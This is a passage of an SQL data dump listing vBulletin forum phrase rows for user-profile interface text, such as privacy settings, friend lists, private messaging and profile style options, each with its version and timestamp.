(38518, -1, 'moderated_visitor_messages', 'user', 'Moderated Visitor Messages', 'vbulletin', 'vBulletin Solutions', 1200616228, '3.7.0 Beta 4'),
(38519, -1, 'moderated_within', 'user', 'Moderated within', 'vbulletin', 'vBulletin Solutions', 1142534172, '3.6.0 Beta 1'),
(38520, -1, 'moderation', 'user', 'Moderation', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(38521, -1, 'more_text_here', 'user', 'More Text Here', 'vbulletin', 'vBulletin Solutions', 1193401163, '3.7.0 Beta 1'),
(38522, -1, 'most_recent_message', 'user', 'Most Recent Message', 'vbulletin', 'vBulletin Solutions', 1194534043, '3.7.0 Beta 1'),
(38523, -1, 'most_recent_user_note', 'user', 'Most Recent User Note', 'vbulletin', 'vBulletin Solutions', 1194366461, '3.7.0 Beta 1'),
(38524, -1, 'msn_messenger_handle', 'user', 'MSN Messenger Handle', 'vbulletin', '', 0, ''),
(38525, -1, 'new_email_address', 'user', 'New Email Address', 'vbulletin', '', 0, ''),
(38526, -1, 'new_items', 'user', 'New Items', 'vbulletin', 'vBulletin Solutions', 1219157359, '3.8.0 Alpha 1'),
(38527, -1, 'new_password', 'user', 'New Password', 'vbulletin', '', 0, ''),
(38528, -1, 'new_picture_comments', 'user', 'New Picture Comments', 'vbulletin', 'vBulletin Solutions', 1219143687, '3.8.0 Alpha 1'),
(38529, -1, 'new_pictures', 'user', 'New Pictures', 'vbulletin', 'vBulletin Solutions', 1219141972, '3.8.0 Alpha 1'),
(38530, -1, 'new_private_messages', 'user', 'New Private Messages', 'vbulletin', '', 0, ''),
(38531, -1, 'new_social_group_discussions', 'user', 'New Social Group Discussions', 'vbulletin', 'vBulletin Solutions', 1219141027, '3.8.0 Alpha 1'),
(38532, -1, 'new_social_group_messages', 'user', 'New Social Group Messages', 'vbulletin', 'vBulletin Solutions', 1219141047, '3.8.0 Alpha 1'),
(38533, -1, 'new_subscribed_discussions', 'user', 'New Subscribed Discussions', 'vbulletin', 'vBulletin Solutions', 1213873252, '3.7.1'),
(38534, -1, 'new_subscribed_threads', 'user', 'New Subscribed Threads', 'vbulletin', '', 0, ''),
(38535, -1, 'new_visitor_messages', 'user', 'New Visitor Messages', 'vbulletin', 'vBulletin Solutions', 1197370594, '3.7.0 Beta 1'),
(38536, -1, 'newest_first', 'user', 'Newest First', 'vbulletin', '', 0, ''),
(38537, -1, 'no_avatar_specified', 'user', 'No Avatar Specified', 'vbulletin', '', 0, ''),
(38538, -1, 'no_pictures_found', 'user', 'No Pictures Found', 'vbulletin', 'vBulletin Solutions', 1203712729, '3.7.0 Beta 6'),
(38539, -1, 'no_posts_found', 'user', 'No posts found.', 'vbulletin', 'vBulletin Solutions', 1142537086, '3.6.0 Beta 1'),
(38540, -1, 'no_profile_picture', 'user', 'No Profile Picture Specified', 'vbulletin', 'vBulletin Solutions', 1159991122, '3.6.3'),
(38541, -1, 'no_subscribed_discussions_to_display', 'user', 'There are no subscribed discussions for this time period.', 'vbulletin', 'vBulletin Solutions', 1213872824, '3.7.1'),
(38542, -1, 'no_subscribed_threads_to_display', 'user', 'There are no subscribed threads to display in this folder for this time period.', 'vbulletin', '', 0, ''),
(38543, -1, 'no_visitor_messages_between_members', 'user', 'There are no visitor messages between these members.', 'vbulletin', 'vBulletin Solutions', 1201110430, '3.7.0 Beta 5'),
(38544, -1, 'note_have_custom_avatar_delete', 'user', 'Note: if you have a custom avatar selecting this option will delete it.', 'vbulletin', '', 0, ''),
(38545, -1, 'note_maximum_size_x', 'user', 'Note: The maximum size of your custom image is {1}.', 'vbulletin', '', 0, ''),
(38546, -1, 'note_maximum_size_x_y_or_z', 'user', 'Note: The maximum size of your custom image is {1} by {2} pixels or {3} (whichever is smaller).', 'vbulletin', '', 0, ''),
(38547, -1, 'note_maximum_size_x_y_pixels', 'user', 'Note: The maximum size of your custom image is {1} by {2} pixels.', 'vbulletin', '', 0, ''),
(38548, -1, 'oldest_first', 'user', 'Oldest First', 'vbulletin', '', 0, ''),
(38549, -1, 'option_to_hide_elements', 'user', 'You have the option to show or hide various elements of messages, which may be of use to users on slow internet connections, or who want to remove extraneous clutter from posts.', 'vbulletin', '', 0, ''),
(38550, -1, 'optional_information_will', 'user', 'Optional Information - All information will be viewable by other forum members.', 'vbulletin', '', 0, ''),
(38551, -1, 'or_enter_your_choice_here', 'user', 'Or enter your choice here', 'vbulletin', '', 0, ''),
(38552, -1, 'parent_email_address', 'user', 'Parent Email Address', 'vbulletin', '', 0, ''),
(38553, -1, 'parent_guardian_email', 'user', 'Parent / Guardian Email', 'vbulletin', '', 0, ''),
(38554, -1, 'parts_use_different_start_of_week', 'user', 'Different parts of the world traditionally use a different day as the start of the week. Select the appropriate day for your region here, in order to have the calendar appear correctly.', 'vbulletin', '', 0, ''),
(38555, -1, 'pending_friend_requests', 'user', 'Pending Friend Requests', 'vbulletin', 'vBulletin Solutions', 1195580929, '3.7.0 Beta 1'),
(38556, -1, 'pending_friends_list', 'user', 'Pending Friends List', 'vbulletin', 'vBulletin Solutions', 1193688221, '3.7.0 Beta 1'),
(38557, -1, 'pending_picture_comments', 'user', 'Pending Picture Comments', 'vbulletin', 'vBulletin Solutions', 1200331585, '3.7.0 Beta 4'),
(38558, -1, 'picture_comments', 'user', 'Picture Comments', 'vbulletin', 'vBulletin Solutions', 1200695073, '3.7.0 Beta 4'),
(38559, -1, 'picture_x_by_y', 'user', 'Picture: {2} by {4} ', 'vbulletin', 'vBulletin Solutions', 1200700643, '3.7.0 Beta 4'),
(38560, -1, 'pictures', 'user', 'Pictures', 'vbulletin', 'vBulletin Solutions', 1203712876, '3.7.0 Beta 6'),
(38561, -1, 'pm_from_contacts_only', 'user', 'Receive Private Messages only from Contacts and Moderators', 'vbulletin', 'vBulletin Solutions', 1196423686, '3.7.0 Beta 1'),
(38562, -1, 'points', 'user', 'Points', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(38563, -1, 'post_a_user_note', 'user', 'Post a User Note', 'vbulletin', 'vBulletin Solutions', 1194366533, '3.7.0 Beta 1'),
(38564, -1, 'post_a_visitor_message_for_x', 'user', 'Post a visitor message for {1}', 'vbulletin', 'vBulletin Solutions', 1197370626, '3.7.0 Beta 1'),
(38565, -1, 'post_count', 'user', 'Post Count', 'vbulletin', '', 0, ''),
(38566, -1, 'post_message', 'user', 'Post Message', 'vbulletin', 'vBulletin Solutions', 1194444279, '3.7.0 Beta 1'),
(38567, -1, 'post_new_visitor_message', 'user', 'Post New Visitor Message', 'vbulletin', 'vBulletin Solutions', 1197370639, '3.7.0 Beta 1'),
(38568, -1, 'posting_message', 'user', 'Posting Message', 'vbulletin', 'vBulletin Solutions', 1191537954, '3.7.0 Beta 1'),
(38569, -1, 'posting_message_please_wait', 'user', 'Posting Message - Please Wait', 'vbulletin', 'vBulletin Solutions', 1194555368, '3.7.0 Beta 1'),
(38570, -1, 'posts_per_day', 'user', 'Posts Per Day', 'vbulletin', 'vBulletin Solutions', 1194365856, '3.7.0 Beta 1'),
(38571, -1, 'posts_to_show_per_page', 'user', 'Number of Posts to Show Per Page', 'vbulletin', '', 0, ''),
(38572, -1, 'predefined_x', 'user', 'Pre-defined {1}', 'vbulletin', '', 0, ''),
(38573, -1, 'preview_signature', 'user', 'Preview Signature', 'vbulletin', '', 0, ''),
(38574, -1, 'primary_users', 'user', 'Primary Users', 'vbulletin', '', 0, ''),
(38575, -1, 'print_new_permissions_form', 'user', 'To print out a new permissions form, please click the button below.', 'vbulletin', '', 0, ''),
(38576, -1, 'privacy', 'user', 'Privacy', 'vbulletin', '', 0, ''),
(38577, -1, 'private_messaging', 'user', 'Private Messaging', 'vbulletin', '', 0, ''),
(38578, -1, 'profile', 'user', 'Profile', 'vbulletin', '', 0, ''),
(38579, -1, 'profile_infraction', 'user', 'Profile Infraction', 'vbulletin', 'vBulletin Solutions', 1149265467, '3.6.0 Beta 1'),
(38580, -1, 'profile_picture', 'user', 'Profile Picture', 'vbulletin', '', 0, ''),
(38581, -1, 'profile_picture_desc', 'user', 'Profile pictures are small pictures of yourself, which are displayed within your user profile.', 'vbulletin', 'vBulletin Solutions', 1197888889, '3.7.0 Beta 2'),
(38582, -1, 'profile_privacy', 'user', 'Profile Privacy', 'vbulletin', 'vBulletin Solutions', 1215087345, '3.8.0 Alpha 1'),
(38583, -1, 'profile_style', 'user', 'Profile Style', 'vbulletin', 'vBulletin Solutions', 1215086911, '3.8.0 Alpha 1'),
(38584, -1, 'profile_warning', 'user', 'Profile Warning', 'vbulletin', 'vBulletin Solutions', 1148660915, '3.6.0 Beta 1'),
(38585, -1, 'profile_x', 'user', 'Profile: {2} ', 'vbulletin', 'vBulletin Solutions', 1200525617, '3.7.0 Beta 4'),
(38586, -1, 'public_usergroups', 'user', 'Public Usergroups', 'vbulletin', 'vBulletin Solutions', 1194360190, '3.7.0 Beta 1'),
(38587, -1, 'reason_for_request', 'user', 'Please state your reason for this request', 'vbulletin', '', 0, ''),
(38588, -1, 'receive_admin_emails', 'user', 'Receive Admin Emails', 'vbulletin', '', 0, ''),
(38589, -1, 'receive_email', 'user', 'Receive Email', 'vbulletin', '', 0, ''),
(38590, -1, 'receive_email_for_friendship_request', 'user', 'If you do not want to receive an email for each request of friendship, you may disable this option.', 'vbulletin', 'vBulletin Solutions', 1197578577, '3.7.0 Beta 2'),
(38591, -1, 'receive_email_from_bulletin_board_staff', 'user', 'Receive Email from Administrators', 'vbulletin', '', 0, ''),
(38592, -1, 'receive_email_from_other_members', 'user', 'Receive Email from Other Members', 'vbulletin', '', 0, ''),
(38593, -1, 'receive_email_notification_pm', 'user', 'Receive Email Notification of New Private Messages', 'vbulletin', '', 0, ''),
(38594, -1, 'receive_friendship_req_email', 'user', 'Receive Friendship Request Email', 'vbulletin', 'vBulletin Solutions', 1197578651, '3.7.0 Beta 2'),
(38595, -1, 'receive_private_messages', 'user', 'Receive Private Messages', 'vbulletin', '', 0, ''),
(38596, -1, 'receive_user_emails', 'user', 'Receive Email from Other Users', 'vbulletin', '', 0, ''),
(38597, -1, 'recent_messages', 'user', 'Recent Messages', 'vbulletin', 'vBulletin Solutions', 1191537845, '3.7.0 Beta 1'),
(38598, -1, 'recent_visitors', 'user', 'Recent Visitors', 'vbulletin', 'vBulletin Solutions', 1194350749, '3.7.0 Beta 1'),
(38599, -1, 'referrals', 'user', 'Referrals', 'vbulletin', '', 0, ''),
(38600, -1, 'referrer', 'user', 'Referrer', 'vbulletin', '', 0, ''),
(38601, -1, 'registered_members', 'user', 'Registered Members', 'vbulletin', 'vBulletin Solutions', 1215094683, '3.8.0 Alpha 1'),
(38602, -1, 'registration_required_information', 'user', 'Registration Required Information - All fields are required.', 'vbulletin', '', 0, ''),
(38603, -1, 'reject_selected_friend_requests', 'user', 'Reject selected friend requests', 'vbulletin', 'vBulletin Solutions', 1196430250, '3.7.0 Beta 1'),
(38604, -1, 'remove_from_contacts', 'user', 'Remove from Contacts', 'vbulletin', 'vBulletin Solutions', 1196422741, '3.7.0 Beta 1'),
(38605, -1, 'remove_from_friends_list', 'user', 'Remove from Friends List', 'vbulletin', 'vBulletin Solutions', 1195580950, '3.7.0 Beta 1'),
(38606, -1, 'remove_from_ignore_list', 'user', 'Remove from Ignore List', 'vbulletin', 'vBulletin Solutions', 1195580958, '3.7.0 Beta 1'),
(38607, -1, 'remove_from_userlist_confirm', 'user', 'Are you sure you want to remove these user(s)?', 'vbulletin', 'vBulletin Solutions', 1199921602, '3.7.0 Beta 4'),
(38608, -1, 'remove_selected_users', 'user', 'Remove Selected User(s)', 'vbulletin', '', 0, ''),
(38609, -1, 'remove_x_from_contacts_confirm', 'user', 'Are you sure you want to remove {1} from your contacts?', 'vbulletin', 'vBulletin Solutions', 1196422913, '3.7.0 Beta 1'),
(38610, -1, 'remove_x_from_friendlist_confirm', 'user', 'Are you sure you want to remove {1} from your friend list?', 'vbulletin', 'vBulletin Solutions', 1195754300, '3.7.0 Beta 1'),
(38611, -1, 'remove_x_from_ignore_list', 'user', 'Remove {1} from Your Ignore List', 'vbulletin', 'vBulletin Solutions', 1195037229, '3.7.0 Beta 1'),
(38612, -1, 'remove_x_from_ignorelist_confirm', 'user', 'Are you sure you want to remove {1} from your ignore list?', 'vbulletin', 'vBulletin Solutions', 1195754317, '3.7.0 Beta 1'),
(38613, -1, 'remove_x_from_your_ignorelist', 'user', 'Remove {1} from your Ignore List', 'vbulletin', '', 0, ''),
(38614, -1, 'report', 'user', 'Report', 'vbulletin', 'vBulletin Solutions', 1194545337, '3.7.0 Beta 1'),
(38615, -1, 'report_bad_visitor_message', 'user', 'Report Visitor Message', 'vbulletin', 'vBulletin Solutions', 1197370671, '3.7.0 Beta 1'),
(38616, -1, 'request_activation_code_sent_email', 'user', 'To request for your activation code to be sent to you by email, please enter your registered email address in the box below then submit the form.', 'vbulletin', '', 0, ''),
(38617, -1, 'request_friendship', 'user', 'Request Friendship', 'vbulletin', 'vBulletin Solutions', 1193688388, '3.7.0 Beta 1'),
(38618, -1, 'request_to_join_group', 'user', 'Request to Join Group', 'vbulletin', '', 0, ''),
(38619, -1, 'request_to_join_x__moderated_by_leaders', 'user', 'Your request to join group \'{1}\' will be moderated by one of the group leaders', 'vbulletin', '', 0, ''),
(38620, -1, 'requested_to_join_x_at_y', 'user', 'You requested to join this group {1} at {2} ', 'vbulletin', '', 0, ''),
(38621, -1, 'requests_approved_by_leader', 'user', 'Requests to join must be approved by a group leader.', 'vbulletin', '', 0, ''),
(38622, -1, 'reset_to_default', 'user', 'Reset to Default', 'vbulletin', 'vBulletin Solutions', 1205249172, '3.7.0 Release Candidate 1'),
(38623, -1, 'reverse', 'user', 'Reverse', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(38624, -1, 'reversed', 'user', 'Reversed', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(38625, -1, 'save_list', 'user', 'Save List', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(38626, -1, 'save_pm_copy_by_default', 'user', 'When sending private messages the forum can make a copy of the message in your Sent Items folder.', 'vbulletin', 'vBulletin Solutions', 1214913070, '3.8.0 Alpha 1'),
(38627, -1, 'save_pm_copy_default', 'user', 'Save a copy of sent messages in my Sent Items folder by default', 'vbulletin', 'vBulletin Solutions', 1214914751, '3.8.0 Alpha 1'),
(38628, -1, 'save_signature', 'user', 'Save Signature', 'vbulletin', '', 0, ''),
(38629, -1, 'search_members', 'user', 'Search Members', 'vbulletin', '', 0, ''),
(38630, -1, 'select_all', 'user', 'Select All', 'vbulletin', 'vBulletin Solutions', 1194544100, '3.7.0 Beta 1'),
(38631, -1, 'select_deleted_posts', 'user', 'Select Deleted Posts', 'vbulletin', 'vBulletin Solutions', 1194544214, '3.7.0 Beta 1'),
(38632, -1, 'select_unapproved_posts', 'user', 'Select Unapproved Posts', 'vbulletin', 'vBulletin Solutions', 1194544200, '3.7.0 Beta 1'),
(38633, -1, 'send_aim_message_to_x', 'user', 'Send an AIM message to {1}', 'vbulletin', 'vBulletin Solutions', 1194962775, '3.7.0 Beta 1'),
(38634, -1, 'send_icq_message_to_x', 'user', 'Send an ICQ message to {1}', 'vbulletin', 'vBulletin Solutions', 1194962781, '3.7.0 Beta 1'),
(38635, -1, 'send_instant_message_to_x_using', 'user', 'Send an Instant Message to {1} Using...', 'vbulletin', 'vBulletin Solutions', 1194962511, '3.7.0 Beta 1'),
(38636, -1, 'send_message', 'user', 'Send Message', 'vbulletin', 'vBulletin Solutions', 1194347549, '3.7.0 Beta 1'),
(38637, -1, 'send_message_to_x', 'user', 'Send a Message to {1}', 'vbulletin', 'vBulletin Solutions', 1194350462, '3.7.0 Beta 1'),
(38638, -1, 'send_msn_message_to_x', 'user', 'Send an MSN message to {1}', 'vbulletin', 'vBulletin Solutions', 1194962787, '3.7.0 Beta 1'),
(38639, -1, 'send_notification_email_when_a_private_message_is_received', 'user', 'Send Notification Email When a Private Message is Received', 'vbulletin', '', 0, ''),
(38640, -1, 'send_request', 'user', 'Send Request', 'vbulletin', '', 0, ''),
(38641, -1, 'send_skype_message_to_x', 'user', 'Send a Skype message to {1}', 'vbulletin', 'vBulletin Solutions', 1194962794, '3.7.0 Beta 1'),
(38642, -1, 'send_yahoo_message_to_x', 'user', 'Send a Yahoo! message to {1}', 'vbulletin', 'vBulletin Solutions', 1194962801, '3.7.0 Beta 1'),
(38643, -1, 'server_failed_respond_try_again', 'user', 'The server failed to respond in time. Please try again.', 'vbulletin', 'vBulletin Solutions', 1193769655, '3.7.0 Beta 1'),
(38644, -1, 'settings_and_options', 'user', 'Settings & Options', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(38645, -1, 'show_all_albums', 'user', 'Show All Albums', 'vbulletin', 'vBulletin Solutions', 1194867727, '3.7.0 Beta 1'),
(38646, -1, 'show_all_friends', 'user', 'Show All Friends', 'vbulletin', 'vBulletin Solutions', 1194867746, '3.7.0 Beta 1'),
(38647, -1, 'show_all_statistics', 'user', 'Show All Statistics', 'vbulletin', 'vBulletin Solutions', 1194867755, '3.7.0 Beta 1'),
(38648, -1, 'show_all_threads', 'user', 'Show all threads', 'vbulletin', '', 0, ''),
(38649, -1, 'show_avatars', 'user', 'Show Avatars', 'vbulletin', '', 0, ''),
(38650, -1, 'show_enhanced_editor_toolbar', 'user', 'Show Enhanced (WYSIWYG) Editor Toolbar', 'vbulletin', '', 0, ''),
(38651, -1, 'show_images', 'user', 'Show Images', 'vbulletin', '', 0, ''),
(38652, -1, 'show_pm_popup', 'user', 'Show New Private Message Notification Pop-up', 'vbulletin', '', 0, ''),
(38653, -1, 'show_signatures', 'user', 'Show Signatures', 'vbulletin', '', 0, ''),
(38654, -1, 'show_standard_editor_toolbar', 'user', 'Show Standard Editor Toolbar', 'vbulletin', '', 0, ''),
(38655, -1, 'show_user_customizations', 'user', 'Show User Customizations', 'vbulletin', 'vBulletin Solutions', 1195482968, '3.7.0 Beta 1'),
(38656, -1, 'show_x_posts_per_page', 'user', 'Show {1} Posts Per Page', 'vbulletin', '', 0, ''),
(38657, -1, 'show_your_reputation_level', 'user', 'Show Your Reputation Level', 'vbulletin', 'vBulletin Solutions', 1197902749, '3.7.0 Beta 2'),
(38658, -1, 'showing_friends_x_to_y_of_z', 'user', 'Showing Friends {1} to {2} of {3}', 'vbulletin', 'vBulletin Solutions', 1205925103, '3.7.0 Release Candidate 1'),
(38659, -1, 'showing_pcs_x_to_y_of_z', 'user', 'Showing Picture Comments {1} to {2} of {3} ', 'vbulletin', 'vBulletin Solutions', 1205925128, '3.7.0 Release Candidate 1'),
(38660, -1, 'showing_vms_x_to_y_of_z', 'user', 'Showing Visitor Messages {1} to {2} of {3} ', 'vbulletin', 'vBulletin Solutions', 1205925144, '3.7.0 Release Candidate 1'),
(38661, -1, 'showing_x_of_y_friends', 'user', 'Showing {1} of {2} Friend(s)', 'vbulletin', 'vBulletin Solutions', 1205922350, '3.7.0 Release Candidate 1'),
(38662, -1, 'signature_picture', 'user', 'Signature Picture', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(38663, -1, 'skype_name', 'user', 'Skype Name', 'vbulletin', '', 0, ''),
(38664, -1, 'small_text_here', 'user', 'Small Text Here', 'vbulletin', 'vBulletin Solutions', 1193401376, '3.7.0 Beta 1'),
(38665, -1, 'standard_editor_extra_formatting', 'user', 'Standard Editor - Extra formatting controls', 'vbulletin', '', 0, ''),
(38666, -1, 'start_of_the_week', 'user', 'Start of the Week', 'vbulletin', '', 0, ''),
(38667, -1, 'statistics', 'user', 'Statistics', 'vbulletin', 'vBulletin Solutions', 1194351035, '3.7.0 Beta 1'),
(38668, -1, 'subscribed_forums', 'user', 'Subscribed Forums', 'vbulletin', '', 0, ''),
(38669, -1, 'subscribed_social_groups', 'user', 'Subscribed Social Groups', 'vbulletin', 'vBulletin Solutions', 1213883563, '3.7.1'),
(38670, -1, 'switch_skin_select', 'user', 'There is more than one skin in which you can view the forums. If you would like to switch to a different skin, select it from this list. \r\n \r\n Please note that some forums here may override your skin choice temporarily.', 'vbulletin', '', 0, ''),
(38671, -1, 'text_here', 'user', 'Text Here', 'vbulletin', 'vBulletin Solutions', 1193401088, '3.7.0 Beta 1'),
(38672, -1, 'the_following_groups_need_attention', 'user', 'The following groups need attention', 'vbulletin', 'vBulletin Solutions', 1196869281, '3.7.0 Beta 1'),
(38673, -1, 'this_message_is_moderated', 'user', 'This Message is Moderated', 'vbulletin', 'vBulletin Solutions', 1194535122, '3.7.0 Beta 1'),
(38674, -1, 'this_page', 'user', 'This Page', 'vbulletin', 'vBulletin Solutions', 1194356809, '3.7.0 Beta 1'),
(38675, -1, 'this_page_has_x_visits', 'user', 'This page has had {1} visits', 'vbulletin', 'vBulletin Solutions', 1194365262, '3.7.0 Beta 1'),
(38676, -1, 'thread_display_mode', 'user', 'Thread Display Mode', 'vbulletin', '', 0, ''),
(38677, -1, 'thread_display_options', 'user', 'Thread Display Options', 'vbulletin', '', 0, ''),
(38678, -1, 'threaded', 'user', 'Threaded', 'vbulletin', '', 0, ''),
(38679, -1, 'tick_box_to_make_friends_with_x', 'user', 'Check this box to make friends with {1}', 'vbulletin', 'vBulletin Solutions', 1209205296, '3.7.0'),
(38680, -1, 'time_auto_corrected_to_location', 'user', 'All timestamps displayed on the forums can be automatically corrected to show the correct time for your location in the world. Simply select the appropriate time zone from the list below.', 'vbulletin', '', 0, ''),
(38681, -1, 'time_period_to_display_threads', 'user', 'You may specify a time period from which to display threads. Threads older than the age you specify will not be shown.', 'vbulletin', '', 0, ''),
(38682, -1, 'time_zone', 'user', 'Time Zone', 'vbulletin', '', 0, ''),
(38683, -1, 'title_appears_beneath_your_name', 'user', 'This is the title that appears beneath your name on your posts. Check the \'Reset\' box if you wish to use the default title for your usergroup and post count.', 'vbulletin', '', 0, ''),
(38684, -1, 'to_delete_a_folder_subs', 'user', 'To delete a folder, remove the folder\'s name from the list.', 'vbulletin', '', 0, ''),
(38685, -1, 'total_albums', 'user', 'Total Albums', 'vbulletin', 'vBulletin Solutions', 1194365908, '3.7.0 Beta 1'),
(38686, -1, 'total_messages', 'user', 'Total Messages', 'vbulletin', 'vBulletin Solutions', 1191537833, '3.7.0 Beta 1'),
(38687, -1, 'total_pictures', 'user', 'Total Pictures', 'vbulletin', 'vBulletin Solutions', 1194365921, '3.7.0 Beta 1'),
(38688, -1, 'total_posts', 'user', 'Total Posts', 'vbulletin', '', 0, ''),
(38689, -1, 'total_user_notes', 'user', 'Total User Notes', 'vbulletin', 'vBulletin Solutions', 1194366416, '3.7.0 Beta 1'),
(38690, -1, 'transparent', 'user', 'Transparent', 'vbulletin', 'vBulletin Solutions', 1193401030, '3.7.0 Beta 1'),
(38691, -1, 'unapprove_messages', 'user', 'Unapprove Messages', 'vbulletin', 'vBulletin Solutions', 1191537389, '3.7.0 Beta 1'),
(38692, -1, 'undelete_messages', 'user', 'Undelete Messages', 'vbulletin', 'vBulletin Solutions', 1191537369, '3.7.0 Beta 1'),
(38693, -1, 'unregistered_users', 'user', 'Unregistered Users', 'vbulletin', 'vBulletin Solutions', 1215094659, '3.8.0 Alpha 1'),
(38694, -1, 'update_display_group', 'user', 'Update Display Group', 'vbulletin', '', 0, ''),
(38695, -1, 'upload_image_from_computer', 'user', 'Upload Image From Your Computer', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(38696, -1, 'upload_sig_image_from_computer', 'user', 'Upload a image to be used as a signature from your computer.', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(38697, -1, 'upload_signature_picture', 'user', 'Upload Signature Picture', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(38698, -1, 'usage_vm_only_from_contacts', 'user', 'You may limit the usage of your visitor messages to just moderators and your contacts .', 'vbulletin', 'vBulletin Solutions', 1203371399, '3.7.0 Beta 6'),
(38699, -1, 'use_can_make_customizations', 'user', 'Other users can make customizations to some of their pages, such as their profile page. With this option you can choose to hide these customizations.', 'vbulletin', 'vBulletin Solutions', 1218624095, '3.8.0 Alpha 1'),
(38700, -1, 'use_custom_avatar', 'user', 'Use Custom Avatar', 'vbulletin', '', 0, ''),
(38701, -1, 'use_forum_default', 'user', 'Use Forum Default', 'vbulletin', '', 0, ''),
(38702, -1, 'use_invisible_mode', 'user', 'Use Invisible Mode', 'vbulletin', '', 0, ''),
(38703, -1, 'use_profile_picture', 'user', 'Use Profile Picture', 'vbulletin', '', 0, ''),
(38704, -1, 'use_set_posts_before_splitting', 'user', 'Use this option to set the number of posts to show in a thread before splitting the display into multiple pages.', 'vbulletin', '', 0, ''),
(38705, -1, 'user_created_social_groups', 'user', 'Social Groups', 'vbulletin', 'vBulletin Solutions', 1245170427, '3.8.3'),
(38706, -1, 'user_customizations', 'user', 'User Customizations', 'vbulletin', 'vBulletin Solutions', 1195483248, '3.7.0 Beta 1'),
(38707, -1, 'user_group', 'user', 'User Group', 'vbulletin', '', 0, ''),
(38708, -1, 'user_lists', 'user', 'User Lists', 'vbulletin', 'vBulletin Solutions', 1195580971, '3.7.0 Beta 1'),
(38709, -1, 'user_notes', 'user', 'User Notes', 'vbulletin', '', 0, ''),
(38710, -1, 'user_notifications', 'user', 'User Notifications', 'vbulletin', 'vBulletin Solutions', 1195580990, '3.7.0 Beta 1'),
(38711, -1, 'user_title', 'user', 'User Title', 'vbulletin', '', 0, ''),
(38712, -1, 'usercss_alternating1', 'user', 'Primary Content Areas', 'vbulletin', 'vBulletin Solutions', 1197552463, '3.7.0 Beta 1'),
(38713, -1, 'usercss_alternating2', 'user', 'Secondary Content Areas', 'vbulletin', 'vBulletin Solutions', 1197552469, '3.7.0 Beta 1'),
(38714, -1, 'usercss_background_color', 'user', 'Background Color', 'vbulletin', 'vBulletin Solutions', 1196876593, '3.7.0 Beta 1'),
(38715, -1, 'usercss_background_image', 'user', 'Background Image', 'vbulletin', 'vBulletin Solutions', 1192121107, '3.7.0 Beta 1'),
(38716, -1, 'usercss_background_repeat', 'user', 'Repeat', 'vbulletin', 'vBulletin Solutions', 1196172960, '3.7.0 Beta 1'),
(38717, -1, 'usercss_border_color', 'user', 'Border Color', 'vbulletin', 'vBulletin Solutions', 1192020439, '3.7.0 Beta 1'),
(38718, -1, 'usercss_border_style', 'user', 'Border Style', 'vbulletin', 'vBulletin Solutions', 1192020419, '3.7.0 Beta 1'),
(38719, -1, 'usercss_border_width', 'user', 'Border Width', 'vbulletin', 'vBulletin Solutions', 1192020455, '3.7.0 Beta 1'),
(38720, -1, 'usercss_borderstyle_dashed', 'user', 'Dashed', 'vbulletin', 'vBulletin Solutions', 1192031376, '3.7.0 Beta 1'),
(38721, -1, 'usercss_borderstyle_dotted', 'user', 'Dotted', 'vbulletin', 'vBulletin Solutions', 1192031364, '3.7.0 Beta 1'),
(38722, -1, 'usercss_borderstyle_double', 'user', 'Double', 'vbulletin', 'vBulletin Solutions', 1192031403, '3.7.0 Beta 1'),
(38723, -1, 'usercss_borderstyle_groove', 'user', 'Groove', 'vbulletin', 'vBulletin Solutions', 1192031427, '3.7.0 Beta 1'),
(38724, -1, 'usercss_borderstyle_hidden', 'user', 'Hidden', 'vbulletin', 'vBulletin Solutions', 1192031347, '3.7.0 Beta 1'),
(38725, -1, 'usercss_borderstyle_inset', 'user', 'Inset', 'vbulletin', 'vBulletin Solutions', 1192031458, '3.7.0 Beta 1'),
(38726, -1, 'usercss_borderstyle_none', 'user', 'None', 'vbulletin', 'vBulletin Solutions', 1192031328, '3.7.0 Beta 1'),
(38727, -1, 'usercss_borderstyle_outset', 'user', 'Outset', 'vbulletin', 'vBulletin Solutions', 1192031472, '3.7.0 Beta 1'),
(38728, -1, 'usercss_borderstyle_ridge', 'user', 'Ridge', 'vbulletin', 'vBulletin Solutions', 1192031446, '3.7.0 Beta 1'),
(38729, -1, 'usercss_borderstyle_solid', 'user', 'Solid', 'vbulletin', 'vBulletin Solutions', 1192031390, '3.7.0 Beta 1'),
(38730, -1, 'usercss_borderwidth_large', 'user', 'Large', 'vbulletin', 'vBulletin Solutions', 1196181898, '3.7.0 Beta 1'),
(38731, -1, 'usercss_borderwidth_medium', 'user', 'Medium', 'vbulletin', 'vBulletin Solutions', 1196181905, '3.7.0 Beta 1'),
(38732, -1, 'usercss_borderwidth_small', 'user', 'Small', 'vbulletin', 'vBulletin Solutions', 1196181926, '3.7.0 Beta 1'),
(38733, -1, 'usercss_color', 'user', 'Text Color', 'vbulletin', 'vBulletin Solutions', 1195046971, '3.7.0 Beta 1'),
(38734, -1, 'usercss_example', 'user', 'Style Customization Example Key', 'vbulletin', 'vBulletin Solutions', 1195129959, '3.7.0 Beta 1'),
(38735, -1, 'usercss_font_arial', 'user', 'Arial', 'vbulletin', 'vBulletin Solutions', 1196182003, '3.7.0 Beta 1'),
(38736, -1, 'usercss_font_comic_sans_ms', 'user', 'Comic Sans MS', 'vbulletin', 'vBulletin Solutions', 1196182036, '3.7.0 Beta 1'),
(38737, -1, 'usercss_font_courier_new', 'user', 'Courier New', 'vbulletin', 'vBulletin Solutions', 1196182060, '3.7.0 Beta 1'),
(38738, -1, 'usercss_font_family', 'user', 'Font Family', 'vbulletin', 'vBulletin Solutions', 1191862087, '3.7.0 Beta 1'),
(38739, -1, 'usercss_font_geneva', 'user', 'Geneva', 'vbulletin', 'vBulletin Solutions', 1196182158, '3.7.0 Beta 1'),
(38740, -1, 'usercss_font_georgia', 'user', 'Georgia', 'vbulletin', 'vBulletin Solutions', 1196182182, '3.7.0 Beta 1'),
